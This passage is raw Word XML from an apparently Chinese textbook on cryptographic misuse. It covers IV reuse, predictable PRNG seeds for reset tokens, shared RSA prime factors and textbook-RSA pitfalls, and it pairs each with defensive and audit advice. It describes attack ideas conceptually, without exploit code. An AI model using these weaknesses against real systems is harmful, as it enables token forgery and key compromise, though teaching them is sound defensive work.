        <w:t xml:space="preserve">CTR/GCM，IV（nonce）唯一性至关重要，可采用随机方式或计数器，但绝不能重复使用同一密钥。现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常自动处理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成和附加到密文，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto/cipher.NewGCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Seal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法会在密文中自动附带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nonce。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">代码审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否硬编码为常数或使用非密码学安全的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">byte[] iv = {0x00,0x00,...}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：无法从流量直接探测固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IV，但可通过渗透测试或源码审计发现此类误用。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="253"/>
    <w:bookmarkStart w:id="254" w:name="弱随机数加密的阿克琉斯之踵"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱随机数：加密的阿克琉斯之踵</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">许多密码学操作依赖不可预测的随机数：密钥生成、IV、nonce、RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">素数生成、DH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">私有指数、SALT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。如果使用的是伪随机数生成器（PRNG）且种子可预测（如基于时间戳、进程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PID），或使用了弱算法如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，那么整个密码体系会崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①：假设服务器用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Random</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类（使用线性同余生成器，种子可能来自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">System.currentTimeMillis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）生成密码重置令牌。攻击者可根据观察到的一枚令牌和近似时间窗口，枚举可能的种子值，预测后续令牌。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密钥生成，若两个用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模数共享一个素因子，可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GCD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">快速分解两个模数，该现象通常由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PRNG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">种子弱导致多个密钥生成过程使用了相同随机状态。此类攻击已在互联网大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公钥扫描中被证实（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Mining Your Ps and Qs”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">正确做法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：所有安全关键随机数必须来自操作系统提供的密码学安全伪随机数生成器（CSPRNG）。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/urandom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；编程语言封装如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SecureRandom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（而非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、Go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto/rand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。绝不使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Math.random</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Random</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这类普通随机。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检查代码中随机数生成器的导入声明，使用安全扫描工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Dependency-Check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合规则）。在渗透测试中，可通过统计方法对公开令牌（如密码重置链接、会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）测试熵质量，例如用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Sequencer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析采样令牌的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FIPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试，但要注意该测试仅能发现极弱随机，不能替代代码审计。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="254"/>
    <w:bookmarkStart w:id="255" w:name="rsa-误用教科书式陷阱"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">误用：教科书式陷阱</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的数学安全性已在《从位到物联》CM5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">详细阐述，但正确使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">远比公式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>c</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:sSup>
          <m:e>
            <m:r>
              <m:t>m</m:t>
            </m:r>
          </m:e>
          <m:sup>
            <m:r>
              <m:t>e</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
        <m:r>
          <m:t> </m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>mod</m:t>
        </m:r>
        <m:r>
          <m:t> </m:t>
        </m:r>
        <m:r>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复杂。现实中最常见的误用包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未填充的“教科书”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：直接对明文</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>m</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计算</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSup>
          <m:e>
            <m:r>
              <m:t>m</m:t>
            </m:r>
          </m:e>
          <m:sup>
            <m:r>
              <m:t>e</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
        <m:r>
          <m:t> </m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>mod</m:t>
        </m:r>
        <m:r>
          <m:t> </m:t>
        </m:r>
        <m:r>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，具有确定性、同态性（</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>E</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>m</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>1</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:e>
        </m:d>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>⋅</m:t>
        </m:r>
        <m:r>
          <m:t>E</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>m</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>2</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:e>
        </m:d>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:t>E</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>m</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>1</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>m</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>2</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），易受选择明文攻击，且对小指数攻击（若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSup>
          <m:e>
            <m:r>
              <m:t>m</m:t>
            </m:r>
          </m:e>
          <m:sup>
            <m:r>
              <m:t>e</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>&lt;</m:t>
        </m:r>
        <m:r>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，则直接开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>e</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次方可恢复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>m</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）完全不设防。正确的方法是使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA-OAEP（最优非对称加密填充），它引入了随机种子和哈希过程，使密文非确定性并满足适应性选择密文攻击安全（IND-CCA2）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">签名不哈希直接“加密”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对消息哈希</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>H</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>m</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行“解密”生成签名，但若未使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PKCS#1 v1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">填充，可被伪造。更隐蔽的误用是直接“加密”原始消息当作签名，攻击者可利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">乘法同态构造伪造签名。PGP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">早期版本曾存在此类问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小公钥指数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>e</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:t>3</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合不恰当的填充曾导致实际攻击（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bleichenbacher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击变种），现在标准推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>e</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:t>65537</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">共模</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：多个用户共享模数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>e</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不同，若同一消息</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>m</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用两个互素指数</w:t>
      </w:r>
